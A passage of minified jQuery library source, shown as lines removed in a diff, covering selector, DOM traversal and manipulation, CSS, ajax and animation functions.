-if(g.firstChild&&typeof g.firstChild.getAttribute!=="undefined"&&g.firstChild.getAttribute("href")!=="#")n.attrHandle.href=function(h){return h.getAttribute("href",2)};g=null})();s.querySelectorAll&&function(){var g=k,h=s.createElement("div");h.innerHTML="<p class='TEST'></p>";if(!(h.querySelectorAll&&h.querySelectorAll(".TEST").length===0)){k=function(m,q,p,v){q=q||s;if(!v&&q.nodeType===9&&!x(q))try{return z(q.querySelectorAll(m),p)}catch(t){}return g(m,q,p,v)};for(var l in g)k[l]=g[l];h=null}}();
-(function(){var g=s.createElement("div");g.innerHTML="<div class='test e'></div><div class='test'></div>";if(!(!g.getElementsByClassName||g.getElementsByClassName("e").length===0)){g.lastChild.className="e";if(g.getElementsByClassName("e").length!==1){n.order.splice(1,0,"CLASS");n.find.CLASS=function(h,l,m){if(typeof l.getElementsByClassName!=="undefined"&&!m)return l.getElementsByClassName(h[1])};g=null}}})();var E=s.compareDocumentPosition?function(g,h){return!!(g.compareDocumentPosition(h)&16)}:
-function(g,h){return g!==h&&(g.contains?g.contains(h):true)},x=function(g){return(g=(g?g.ownerDocument||g:0).documentElement)?g.nodeName!=="HTML":false},ga=function(g,h){var l=[],m="",q;for(h=h.nodeType?[h]:h;q=n.match.PSEUDO.exec(g);){m+=q[0];g=g.replace(n.match.PSEUDO,"")}g=n.relative[g]?g+"*":g;q=0;for(var p=h.length;q<p;q++)k(g,h[q],l);return k.filter(m,l)};c.find=k;c.expr=k.selectors;c.expr[":"]=c.expr.filters;c.unique=k.uniqueSort;c.text=a;c.isXMLDoc=x;c.contains=E})();var eb=/Until$/,fb=/^(?:parents|prevUntil|prevAll)/,
-gb=/,/;R=Array.prototype.slice;var Ia=function(a,b,d){if(c.isFunction(b))return c.grep(a,function(e,j){return!!b.call(e,j,e)===d});else if(b.nodeType)return c.grep(a,function(e){return e===b===d});else if(typeof b==="string"){var f=c.grep(a,function(e){return e.nodeType===1});if(Ua.test(b))return c.filter(b,f,!d);else b=c.filter(b,f)}return c.grep(a,function(e){return c.inArray(e,b)>=0===d})};c.fn.extend({find:function(a){for(var b=this.pushStack("","find",a),d=0,f=0,e=this.length;f<e;f++){d=b.length;
-c.find(a,this[f],b);if(f>0)for(var j=d;j<b.length;j++)for(var i=0;i<d;i++)if(b[i]===b[j]){b.splice(j--,1);break}}return b},has:function(a){var b=c(a);return this.filter(function(){for(var d=0,f=b.length;d<f;d++)if(c.contains(this,b[d]))return true})},not:function(a){return this.pushStack(Ia(this,a,false),"not",a)},filter:function(a){return this.pushStack(Ia(this,a,true),"filter",a)},is:function(a){return!!a&&c.filter(a,this).length>0},closest:function(a,b){if(c.isArray(a)){var d=[],f=this[0],e,j=
-{},i;if(f&&a.length){e=0;for(var o=a.length;e<o;e++){i=a[e];j[i]||(j[i]=c.expr.match.POS.test(i)?c(i,b||this.context):i)}for(;f&&f.ownerDocument&&f!==b;){for(i in j){e=j[i];if(e.jquery?e.index(f)>-1:c(f).is(e)){d.push({selector:i,elem:f});delete j[i]}}f=f.parentNode}}return d}var k=c.expr.match.POS.test(a)?c(a,b||this.context):null;return this.map(function(n,r){for(;r&&r.ownerDocument&&r!==b;){if(k?k.index(r)>-1:c(r).is(a))return r;r=r.parentNode}return null})},index:function(a){if(!a||typeof a===
-"string")return c.inArray(this[0],a?c(a):this.parent().children());return c.inArray(a.jquery?a[0]:a,this)},add:function(a,b){a=typeof a==="string"?c(a,b||this.context):c.makeArray(a);b=c.merge(this.get(),a);return this.pushStack(qa(a[0])||qa(b[0])?b:c.unique(b))},andSelf:function(){return this.add(this.prevObject)}});c.each({parent:function(a){return(a=a.parentNode)&&a.nodeType!==11?a:null},parents:function(a){return c.dir(a,"parentNode")},parentsUntil:function(a,b,d){return c.dir(a,"parentNode",
-d)},next:function(a){return c.nth(a,2,"nextSibling")},prev:function(a){return c.nth(a,2,"previousSibling")},nextAll:function(a){return c.dir(a,"nextSibling")},prevAll:function(a){return c.dir(a,"previousSibling")},nextUntil:function(a,b,d){return c.dir(a,"nextSibling",d)},prevUntil:function(a,b,d){return c.dir(a,"previousSibling",d)},siblings:function(a){return c.sibling(a.parentNode.firstChild,a)},children:function(a){return c.sibling(a.firstChild)},contents:function(a){return c.nodeName(a,"iframe")?
-a.contentDocument||a.contentWindow.document:c.makeArray(a.childNodes)}},function(a,b){c.fn[a]=function(d,f){var e=c.map(this,b,d);eb.test(a)||(f=d);if(f&&typeof f==="string")e=c.filter(f,e);e=this.length>1?c.unique(e):e;if((this.length>1||gb.test(f))&&fb.test(a))e=e.reverse();return this.pushStack(e,a,R.call(arguments).join(","))}});c.extend({filter:function(a,b,d){if(d)a=":not("+a+")";return c.find.matches(a,b)},dir:function(a,b,d){var f=[];for(a=a[b];a&&a.nodeType!==9&&(d===w||a.nodeType!==1||!c(a).is(d));){a.nodeType===
-1&&f.push(a);a=a[b]}return f},nth:function(a,b,d){b=b||1;for(var f=0;a;a=a[d])if(a.nodeType===1&&++f===b)break;return a},sibling:function(a,b){for(var d=[];a;a=a.nextSibling)a.nodeType===1&&a!==b&&d.push(a);return d}});var Ja=/ jQuery\d+="(?:\d+|null)"/g,V=/^\s+/,Ka=/(<([\w:]+)[^>]*?)\/>/g,hb=/^(?:area|br|col|embed|hr|img|input|link|meta|param)$/i,La=/<([\w:]+)/,ib=/<tbody/i,jb=/<|&#?\w+;/,ta=/<script|<object|<embed|<option|<style/i,ua=/checked\s*(?:[^=]|=\s*.checked.)/i,Ma=function(a,b,d){return hb.test(d)?
-a:b+"></"+d+">"},F={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]};F.optgroup=F.option;F.tbody=F.tfoot=F.colgroup=F.caption=F.thead;F.th=F.td;if(!c.support.htmlSerialize)F._default=[1,"div<div>","</div>"];c.fn.extend({text:function(a){if(c.isFunction(a))return this.each(function(b){var d=
-c(this);d.text(a.call(this,b,d.text()))});if(typeof a!=="object"&&a!==w)return this.empty().append((this[0]&&this[0].ownerDocument||s).createTextNode(a));return c.text(this)},wrapAll:function(a){if(c.isFunction(a))return this.each(function(d){c(this).wrapAll(a.call(this,d))});if(this[0]){var b=c(a,this[0].ownerDocument).eq(0).clone(true);this[0].parentNode&&b.insertBefore(this[0]);b.map(function(){for(var d=this;d.firstChild&&d.firstChild.nodeType===1;)d=d.firstChild;return d}).append(this)}return this},
-wrapInner:function(a){if(c.isFunction(a))return this.each(function(b){c(this).wrapInner(a.call(this,b))});return this.each(function(){var b=c(this),d=b.contents();d.length?d.wrapAll(a):b.append(a)})},wrap:function(a){return this.each(function(){c(this).wrapAll(a)})},unwrap:function(){return this.parent().each(function(){c.nodeName(this,"body")||c(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.appendChild(a)})},
-prepend:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b,this)});else if(arguments.length){var a=c(arguments[0]);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b,
-this.nextSibling)});else if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,c(arguments[0]).toArray());return a}},remove:function(a,b){for(var d=0,f;(f=this[d])!=null;d++)if(!a||c.filter(a,[f]).length){if(!b&&f.nodeType===1){c.cleanData(f.getElementsByTagName("*"));c.cleanData([f])}f.parentNode&&f.parentNode.removeChild(f)}return this},empty:function(){for(var a=0,b;(b=this[a])!=null;a++)for(b.nodeType===1&&c.cleanData(b.getElementsByTagName("*"));b.firstChild;)b.removeChild(b.firstChild);
-return this},clone:function(a){var b=this.map(function(){if(!c.support.noCloneEvent&&!c.isXMLDoc(this)){var d=this.outerHTML,f=this.ownerDocument;if(!d){d=f.createElement("div");d.appendChild(this.cloneNode(true));d=d.innerHTML}return c.clean([d.replace(Ja,"").replace(/=([^="'>\s]+\/)>/g,'="$1">').replace(V,"")],f)[0]}else return this.cloneNode(true)});if(a===true){ra(this,b);ra(this.find("*"),b.find("*"))}return b},html:function(a){if(a===w)return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(Ja,
-""):null;else if(typeof a==="string"&&!ta.test(a)&&(c.support.leadingWhitespace||!V.test(a))&&!F[(La.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(Ka,Ma);try{for(var b=0,d=this.length;b<d;b++)if(this[b].nodeType===1){c.cleanData(this[b].getElementsByTagName("*"));this[b].innerHTML=a}}catch(f){this.empty().append(a)}}else c.isFunction(a)?this.each(function(e){var j=c(this),i=j.html();j.empty().append(function(){return a.call(this,e,i)})}):this.empty().append(a);return this},replaceWith:function(a){if(this[0]&&
-this[0].parentNode){if(c.isFunction(a))return this.each(function(b){var d=c(this),f=d.html();d.replaceWith(a.call(this,b,f))});if(typeof a!=="string")a=c(a).detach();return this.each(function(){var b=this.nextSibling,d=this.parentNode;c(this).remove();b?c(b).before(a):c(d).append(a)})}else return this.pushStack(c(c.isFunction(a)?a():a),"replaceWith",a)},detach:function(a){return this.remove(a,true)},domManip:function(a,b,d){function f(u){return c.nodeName(u,"table")?u.getElementsByTagName("tbody")[0]||
-u.appendChild(u.ownerDocument.createElement("tbody")):u}var e,j,i=a[0],o=[],k;if(!c.support.checkClone&&arguments.length===3&&typeof i==="string"&&ua.test(i))return this.each(function(){c(this).domManip(a,b,d,true)});if(c.isFunction(i))return this.each(function(u){var z=c(this);a[0]=i.call(this,u,b?z.html():w);z.domManip(a,b,d)});if(this[0]){e=i&&i.parentNode;e=c.support.parentNode&&e&&e.nodeType===11&&e.childNodes.length===this.length?{fragment:e}:sa(a,this,o);k=e.fragment;if(j=k.childNodes.length===
-1?(k=k.firstChild):k.firstChild){b=b&&c.nodeName(j,"tr");for(var n=0,r=this.length;n<r;n++)d.call(b?f(this[n],j):this[n],n>0||e.cacheable||this.length>1?k.cloneNode(true):k)}o.length&&c.each(o,Qa)}return this}});c.fragments={};c.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){c.fn[a]=function(d){var f=[];d=c(d);var e=this.length===1&&this[0].parentNode;if(e&&e.nodeType===11&&e.childNodes.length===1&&d.length===1){d[b](this[0]);
-return this}else{e=0;for(var j=d.length;e<j;e++){var i=(e>0?this.clone(true):this).get();c.fn[b].apply(c(d[e]),i);f=f.concat(i)}return this.pushStack(f,a,d.selector)}}});c.extend({clean:function(a,b,d,f){b=b||s;if(typeof b.createElement==="undefined")b=b.ownerDocument||b[0]&&b[0].ownerDocument||s;for(var e=[],j=0,i;(i=a[j])!=null;j++){if(typeof i==="number")i+="";if(i){if(typeof i==="string"&&!jb.test(i))i=b.createTextNode(i);else if(typeof i==="string"){i=i.replace(Ka,Ma);var o=(La.exec(i)||["",
-""])[1].toLowerCase(),k=F[o]||F._default,n=k[0],r=b.createElement("div");for(r.innerHTML=k[1]+i+k[2];n--;)r=r.lastChild;if(!c.support.tbody){n=ib.test(i);o=o==="table"&&!n?r.firstChild&&r.firstChild.childNodes:k[1]==="<table>"&&!n?r.childNodes:[];for(k=o.length-1;k>=0;--k)c.nodeName(o[k],"tbody")&&!o[k].childNodes.length&&o[k].parentNode.removeChild(o[k])}!c.support.leadingWhitespace&&V.test(i)&&r.insertBefore(b.createTextNode(V.exec(i)[0]),r.firstChild);i=r.childNodes}if(i.nodeType)e.push(i);else e=
-c.merge(e,i)}}if(d)for(j=0;e[j];j++)if(f&&c.nodeName(e[j],"script")&&(!e[j].type||e[j].type.toLowerCase()==="text/javascript"))f.push(e[j].parentNode?e[j].parentNode.removeChild(e[j]):e[j]);else{e[j].nodeType===1&&e.splice.apply(e,[j+1,0].concat(c.makeArray(e[j].getElementsByTagName("script"))));d.appendChild(e[j])}return e},cleanData:function(a){for(var b,d,f=c.cache,e=c.event.special,j=c.support.deleteExpando,i=0,o;(o=a[i])!=null;i++)if(d=o[c.expando]){b=f[d];if(b.events)for(var k in b.events)e[k]?
-c.event.remove(o,k):Ca(o,k,b.handle);if(j)delete o[c.expando];else o.removeAttribute&&o.removeAttribute(c.expando);delete f[d]}}});var kb=/z-?index|font-?weight|opacity|zoom|line-?height/i,Na=/alpha\([^)]*\)/,Oa=/opacity=([^)]*)/,ha=/float/i,ia=/-([a-z])/ig,lb=/([A-Z])/g,mb=/^-?\d+(?:px)?$/i,nb=/^-?\d/,ob={position:"absolute",visibility:"hidden",display:"block"},pb=["Left","Right"],qb=["Top","Bottom"],rb=s.defaultView&&s.defaultView.getComputedStyle,Pa=c.support.cssFloat?"cssFloat":"styleFloat",ja=
-function(a,b){return b.toUpperCase()};c.fn.css=function(a,b){return X(this,a,b,true,function(d,f,e){if(e===w)return c.curCSS(d,f);if(typeof e==="number"&&!kb.test(f))e+="px";c.style(d,f,e)})};c.extend({style:function(a,b,d){if(!a||a.nodeType===3||a.nodeType===8)return w;if((b==="width"||b==="height")&&parseFloat(d)<0)d=w;var f=a.style||a,e=d!==w;if(!c.support.opacity&&b==="opacity"){if(e){f.zoom=1;b=parseInt(d,10)+""==="NaN"?"":"alpha(opacity="+d*100+")";a=f.filter||c.curCSS(a,"filter")||"";f.filter=
-Na.test(a)?a.replace(Na,b):b}return f.filter&&f.filter.indexOf("opacity=")>=0?parseFloat(Oa.exec(f.filter)[1])/100+"":""}if(ha.test(b))b=Pa;b=b.replace(ia,ja);if(e)f[b]=d;return f[b]},css:function(a,b,d,f){if(b==="width"||b==="height"){var e,j=b==="width"?pb:qb;function i(){e=b==="width"?a.offsetWidth:a.offsetHeight;f!=="border"&&c.each(j,function(){f||(e-=parseFloat(c.curCSS(a,"padding"+this,true))||0);if(f==="margin")e+=parseFloat(c.curCSS(a,"margin"+this,true))||0;else e-=parseFloat(c.curCSS(a,
-"border"+this+"Width",true))||0})}a.offsetWidth!==0?i():c.swap(a,ob,i);return Math.max(0,Math.round(e))}return c.curCSS(a,b,d)},curCSS:function(a,b,d){var f,e=a.style;if(!c.support.opacity&&b==="opacity"&&a.currentStyle){f=Oa.test(a.currentStyle.filter||"")?parseFloat(RegExp.$1)/100+"":"";return f===""?"1":f}if(ha.test(b))b=Pa;if(!d&&e&&e[b])f=e[b];else if(rb){if(ha.test(b))b="float";b=b.replace(lb,"-$1").toLowerCase();e=a.ownerDocument.defaultView;if(!e)return null;if(a=e.getComputedStyle(a,null))f=
-a.getPropertyValue(b);if(b==="opacity"&&f==="")f="1"}else if(a.currentStyle){d=b.replace(ia,ja);f=a.currentStyle[b]||a.currentStyle[d];if(!mb.test(f)&&nb.test(f)){b=e.left;var j=a.runtimeStyle.left;a.runtimeStyle.left=a.currentStyle.left;e.left=d==="fontSize"?"1em":f||0;f=e.pixelLeft+"px";e.left=b;a.runtimeStyle.left=j}}return f},swap:function(a,b,d){var f={};for(var e in b){f[e]=a.style[e];a.style[e]=b[e]}d.call(a);for(e in b)a.style[e]=f[e]}});if(c.expr&&c.expr.filters){c.expr.filters.hidden=function(a){var b=
-a.offsetWidth,d=a.offsetHeight,f=a.nodeName.toLowerCase()==="tr";return b===0&&d===0&&!f?true:b>0&&d>0&&!f?false:c.curCSS(a,"display")==="none"};c.expr.filters.visible=function(a){return!c.expr.filters.hidden(a)}}var sb=J(),tb=/<script(.|\s)*?\/script>/gi,ub=/select|textarea/i,vb=/color|date|datetime|email|hidden|month|number|password|range|search|tel|text|time|url|week/i,N=/=\?(&|$)/,ka=/\?/,wb=/(\?|&)_=.*?(&|$)/,xb=/^(\w+:)?\/\/([^\/?#]+)/,yb=/%20/g,zb=c.fn.load;c.fn.extend({load:function(a,b,d){if(typeof a!==
-"string")return zb.call(this,a);else if(!this.length)return this;var f=a.indexOf(" ");if(f>=0){var e=a.slice(f,a.length);a=a.slice(0,f)}f="GET";if(b)if(c.isFunction(b)){d=b;b=null}else if(typeof b==="object"){b=c.param(b,c.ajaxSettings.traditional);f="POST"}var j=this;c.ajax({url:a,type:f,dataType:"html",data:b,complete:function(i,o){if(o==="success"||o==="notmodified")j.html(e?c("<div />").append(i.responseText.replace(tb,"")).find(e):i.responseText);d&&j.each(d,[i.responseText,o,i])}});return this},
-serialize:function(){return c.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?c.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||ub.test(this.nodeName)||vb.test(this.type))}).map(function(a,b){a=c(this).val();return a==null?null:c.isArray(a)?c.map(a,function(d){return{name:b.name,value:d}}):{name:b.name,value:a}}).get()}});c.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),
-function(a,b){c.fn[b]=function(d){return this.bind(b,d)}});c.extend({get:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b=null}return c.ajax({type:"GET",url:a,data:b,success:d,dataType:f})},getScript:function(a,b){return c.get(a,null,b,"script")},getJSON:function(a,b,d){return c.get(a,b,d,"json")},post:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b={}}return c.ajax({type:"POST",url:a,data:b,success:d,dataType:f})},ajaxSetup:function(a){c.extend(c.ajaxSettings,a)},ajaxSettings:{url:location.href,
-global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:A.XMLHttpRequest&&(A.location.protocol!=="file:"||!A.ActiveXObject)?function(){return new A.XMLHttpRequest}:function(){try{return new A.ActiveXObject("Microsoft.XMLHTTP")}catch(a){}},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},etag:{},ajax:function(a){function b(){e.success&&
-e.success.call(k,o,i,x);e.global&&f("ajaxSuccess",[x,e])}function d(){e.complete&&e.complete.call(k,x,i);e.global&&f("ajaxComplete",[x,e]);e.global&&!--c.active&&c.event.trigger("ajaxStop")}function f(q,p){(e.context?c(e.context):c.event).trigger(q,p)}var e=c.extend(true,{},c.ajaxSettings,a),j,i,o,k=a&&a.context||e,n=e.type.toUpperCase();if(e.data&&e.processData&&typeof e.data!=="string")e.data=c.param(e.data,e.traditional);if(e.dataType==="jsonp"){if(n==="GET")N.test(e.url)||(e.url+=(ka.test(e.url)?
-"&":"?")+(e.jsonp||"callback")+"=?");else if(!e.data||!N.test(e.data))e.data=(e.data?e.data+"&":"")+(e.jsonp||"callback")+"=?";e.dataType="json"}if(e.dataType==="json"&&(e.data&&N.test(e.data)||N.test(e.url))){j=e.jsonpCallback||"jsonp"+sb++;if(e.data)e.data=(e.data+"").replace(N,"="+j+"$1");e.url=e.url.replace(N,"="+j+"$1");e.dataType="script";A[j]=A[j]||function(q){o=q;b();d();A[j]=w;try{delete A[j]}catch(p){}z&&z.removeChild(C)}}if(e.dataType==="script"&&e.cache===null)e.cache=false;if(e.cache===
-false&&n==="GET"){var r=J(),u=e.url.replace(wb,"$1_="+r+"$2");e.url=u+(u===e.url?(ka.test(e.url)?"&":"?")+"_="+r:"")}if(e.data&&n==="GET")e.url+=(ka.test(e.url)?"&":"?")+e.data;e.global&&!c.active++&&c.event.trigger("ajaxStart");r=(r=xb.exec(e.url))&&(r[1]&&r[1]!==location.protocol||r[2]!==location.host);if(e.dataType==="script"&&n==="GET"&&r){var z=s.getElementsByTagName("head")[0]||s.documentElement,C=s.createElement("script");C.src=e.url;if(e.scriptCharset)C.charset=e.scriptCharset;if(!j){var B=
-false;C.onload=C.onreadystatechange=function(){if(!B&&(!this.readyState||this.readyState==="loaded"||this.readyState==="complete")){B=true;b();d();C.onload=C.onreadystatechange=null;z&&C.parentNode&&z.removeChild(C)}}}z.insertBefore(C,z.firstChild);return w}var E=false,x=e.xhr();if(x){e.username?x.open(n,e.url,e.async,e.username,e.password):x.open(n,e.url,e.async);try{if(e.data||a&&a.contentType)x.setRequestHeader("Content-Type",e.contentType);if(e.ifModified){c.lastModified[e.url]&&x.setRequestHeader("If-Modified-Since",
-c.lastModified[e.url]);c.etag[e.url]&&x.setRequestHeader("If-None-Match",c.etag[e.url])}r||x.setRequestHeader("X-Requested-With","XMLHttpRequest");x.setRequestHeader("Accept",e.dataType&&e.accepts[e.dataType]?e.accepts[e.dataType]+", */*":e.accepts._default)}catch(ga){}if(e.beforeSend&&e.beforeSend.call(k,x,e)===false){e.global&&!--c.active&&c.event.trigger("ajaxStop");x.abort();return false}e.global&&f("ajaxSend",[x,e]);var g=x.onreadystatechange=function(q){if(!x||x.readyState===0||q==="abort"){E||
-d();E=true;if(x)x.onreadystatechange=c.noop}else if(!E&&x&&(x.readyState===4||q==="timeout")){E=true;x.onreadystatechange=c.noop;i=q==="timeout"?"timeout":!c.httpSuccess(x)?"error":e.ifModified&&c.httpNotModified(x,e.url)?"notmodified":"success";var p;if(i==="success")try{o=c.httpData(x,e.dataType,e)}catch(v){i="parsererror";p=v}if(i==="success"||i==="notmodified")j||b();else c.handleError(e,x,i,p);d();q==="timeout"&&x.abort();if(e.async)x=null}};try{var h=x.abort;x.abort=function(){x&&h.call(x);
-g("abort")}}catch(l){}e.async&&e.timeout>0&&setTimeout(function(){x&&!E&&g("timeout")},e.timeout);try{x.send(n==="POST"||n==="PUT"||n==="DELETE"?e.data:null)}catch(m){c.handleError(e,x,null,m);d()}e.async||g();return x}},handleError:function(a,b,d,f){if(a.error)a.error.call(a.context||a,b,d,f);if(a.global)(a.context?c(a.context):c.event).trigger("ajaxError",[b,a,f])},active:0,httpSuccess:function(a){try{return!a.status&&location.protocol==="file:"||a.status>=200&&a.status<300||a.status===304||a.status===
-1223||a.status===0}catch(b){}return false},httpNotModified:function(a,b){var d=a.getResponseHeader("Last-Modified"),f=a.getResponseHeader("Etag");if(d)c.lastModified[b]=d;if(f)c.etag[b]=f;return a.status===304||a.status===0},httpData:function(a,b,d){var f=a.getResponseHeader("content-type")||"",e=b==="xml"||!b&&f.indexOf("xml")>=0;a=e?a.responseXML:a.responseText;e&&a.documentElement.nodeName==="parsererror"&&c.error("parsererror");if(d&&d.dataFilter)a=d.dataFilter(a,b);if(typeof a==="string")if(b===
-"json"||!b&&f.indexOf("json")>=0)a=c.parseJSON(a);else if(b==="script"||!b&&f.indexOf("javascript")>=0)c.globalEval(a);return a},param:function(a,b){function d(i,o){if(c.isArray(o))c.each(o,function(k,n){b||/\[\]$/.test(i)?f(i,n):d(i+"["+(typeof n==="object"||c.isArray(n)?k:"")+"]",n)});else!b&&o!=null&&typeof o==="object"?c.each(o,function(k,n){d(i+"["+k+"]",n)}):f(i,o)}function f(i,o){o=c.isFunction(o)?o():o;e[e.length]=encodeURIComponent(i)+"="+encodeURIComponent(o)}var e=[];if(b===w)b=c.ajaxSettings.traditional;
-if(c.isArray(a)||a.jquery)c.each(a,function(){f(this.name,this.value)});else for(var j in a)d(j,a[j]);return e.join("&").replace(yb,"+")}});var la={},Ab=/toggle|show|hide/,Bb=/^([+-]=)?([\d+-.]+)(.*)$/,W,va=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];c.fn.extend({show:function(a,b){if(a||a===0)return this.animate(K("show",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");
-this[a].style.display=d||"";if(c.css(this[a],"display")==="none"){d=this[a].nodeName;var f;if(la[d])f=la[d];else{var e=c("<"+d+" />").appendTo("body");f=e.css("display");if(f==="none")f="block";e.remove();la[d]=f}c.data(this[a],"olddisplay",f)}}a=0;for(b=this.length;a<b;a++)this[a].style.display=c.data(this[a],"olddisplay")||"";return this}},hide:function(a,b){if(a||a===0)return this.animate(K("hide",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");!d&&d!=="none"&&c.data(this[a],
-"olddisplay",c.css(this[a],"display"))}a=0;for(b=this.length;a<b;a++)this[a].style.display="none";return this}},_toggle:c.fn.toggle,toggle:function(a,b){var d=typeof a==="boolean";if(c.isFunction(a)&&c.isFunction(b))this._toggle.apply(this,arguments);else a==null||d?this.each(function(){var f=d?a:c(this).is(":hidden");c(this)[f?"show":"hide"]()}):this.animate(K("toggle",3),a,b);return this},fadeTo:function(a,b,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,d)},
-animate:function(a,b,d,f){var e=c.speed(b,d,f);if(c.isEmptyObject(a))return this.each(e.complete);return this[e.queue===false?"each":"queue"](function(){var j=c.extend({},e),i,o=this.nodeType===1&&c(this).is(":hidden"),k=this;for(i in a){var n=i.replace(ia,ja);if(i!==n){a[n]=a[i];delete a[i];i=n}if(a[i]==="hide"&&o||a[i]==="show"&&!o)return j.complete.call(this);if((i==="height"||i==="width")&&this.style){j.display=c.css(this,"display");j.overflow=this.style.overflow}if(c.isArray(a[i])){(j.specialEasing=
-j.specialEasing||{})[i]=a[i][1];a[i]=a[i][0]}}if(j.overflow!=null)this.style.overflow="hidden";j.curAnim=c.extend({},a);c.each(a,function(r,u){var z=new c.fx(k,j,r);if(Ab.test(u))z[u==="toggle"?o?"show":"hide":u](a);else{var C=Bb.exec(u),B=z.cur(true)||0;if(C){u=parseFloat(C[2]);var E=C[3]||"px";if(E!=="px"){k.style[r]=(u||1)+E;B=(u||1)/z.cur(true)*B;k.style[r]=B+E}if(C[1])u=(C[1]==="-="?-1:1)*u+B;z.custom(B,u,E)}else z.custom(B,u,"")}});return true})},stop:function(a,b){var d=c.timers;a&&this.queue([]);
-this.each(function(){for(var f=d.length-1;f>=0;f--)if(d[f].elem===this){b&&d[f](true);d.splice(f,1)}});b||this.dequeue();return this}});c.each({slideDown:K("show",1),slideUp:K("hide",1),slideToggle:K("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(a,b){c.fn[a]=function(d,f){return this.animate(b,d,f)}});c.extend({speed:function(a,b,d){var f=a&&typeof a==="object"?a:{complete:d||!d&&b||c.isFunction(a)&&a,duration:a,easing:d&&b||b&&!c.isFunction(b)&&b};f.duration=c.fx.off?0:typeof f.duration===
-"number"?f.duration:c.fx.speeds[f.duration]||c.fx.speeds._default;f.old=f.complete;f.complete=function(){f.queue!==false&&c(this).dequeue();c.isFunction(f.old)&&f.old.call(this)};return f},easing:{linear:function(a,b,d,f){return d+f*a},swing:function(a,b,d,f){return(-Math.cos(a*Math.PI)/2+0.5)*f+d}},timers:[],fx:function(a,b,d){this.options=b;this.elem=a;this.prop=d;if(!b.orig)b.orig={}}});c.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this);(c.fx.step[this.prop]||
-c.fx.step._default)(this);if((this.prop==="height"||this.prop==="width")&&this.elem.style)this.elem.style.display="block"},cur:function(a){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null))return this.elem[this.prop];return(a=parseFloat(c.css(this.elem,this.prop,a)))&&a>-10000?a:parseFloat(c.curCSS(this.elem,this.prop))||0},custom:function(a,b,d){function f(j){return e.step(j)}this.startTime=J();this.start=a;this.end=b;this.unit=d||this.unit||"px";this.now=this.start;
-this.pos=this.state=0;var e=this;f.elem=this.elem;if(f()&&c.timers.push(f)&&!W)W=setInterval(c.fx.tick,13)},show:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.show=true;this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur());c(this.elem).show()},hide:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(a){var b=J(),d=true;if(a||b>=this.options.duration+this.startTime){this.now=
-this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;for(var f in this.options.curAnim)if(this.options.curAnim[f]!==true)d=false;if(d){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;a=c.data(this.elem,"olddisplay");this.elem.style.display=a?a:this.options.display;if(c.css(this.elem,"display")==="none")this.elem.style.display="block"}this.options.hide&&c(this.elem).hide();if(this.options.hide||this.options.show)for(var e in this.options.curAnim)c.style(this.elem,
-e,this.options.orig[e]);this.options.complete.call(this.elem)}return false}else{e=b-this.startTime;this.state=e/this.options.duration;a=this.options.easing||(c.easing.swing?"swing":"linear");this.pos=c.easing[this.options.specialEasing&&this.options.specialEasing[this.prop]||a](this.state,e,0,1,this.options.duration);this.now=this.start+(this.end-this.start)*this.pos;this.update()}return true}};c.extend(c.fx,{tick:function(){for(var a=c.timers,b=0;b<a.length;b++)a[b]()||a.splice(b--,1);a.length||
-c.fx.stop()},stop:function(){clearInterval(W);W=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){c.style(a.elem,"opacity",a.now)},_default:function(a){if(a.elem.style&&a.elem.style[a.prop]!=null)a.elem.style[a.prop]=(a.prop==="width"||a.prop==="height"?Math.max(0,a.now):a.now)+a.unit;else a.elem[a.prop]=a.now}}});if(c.expr&&c.expr.filters)c.expr.filters.animated=function(a){return c.grep(c.timers,function(b){return a===b.elem}).length};c.fn.offset="getBoundingClientRect"in s.documentElement?
